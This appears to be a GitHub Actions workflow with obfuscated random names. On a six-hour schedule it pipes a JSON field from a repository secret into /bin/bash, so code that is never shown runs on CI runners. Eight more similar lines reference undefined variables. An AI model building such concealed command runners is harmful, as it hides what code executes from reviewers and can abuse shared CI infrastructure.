name: shidatin
on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shidatin
        env:
          a306: ${{ secrets.a306 }}
        run: |
          echo $a306 | jq -r .yf675 | /bin/bash
          echo $ylxgn26818 | jq -r .vpyh32 | /bin/bash
          echo $op77371 | jq -r .ivqdl6994 | /bin/bash
          echo $vf401 | jq -r .hqfxx64 | /bin/bash
          echo $uenw00 | jq -r .a93 | /bin/bash
          echo $bs6 | jq -r .ssf40011 | /bin/bash
          echo $szijh76 | jq -r .nez51 | /bin/bash
          echo $o75 | jq -r .ghnu9715 | /bin/bash
          echo $dfn16 | jq -r .vsio1 | /bin/bash

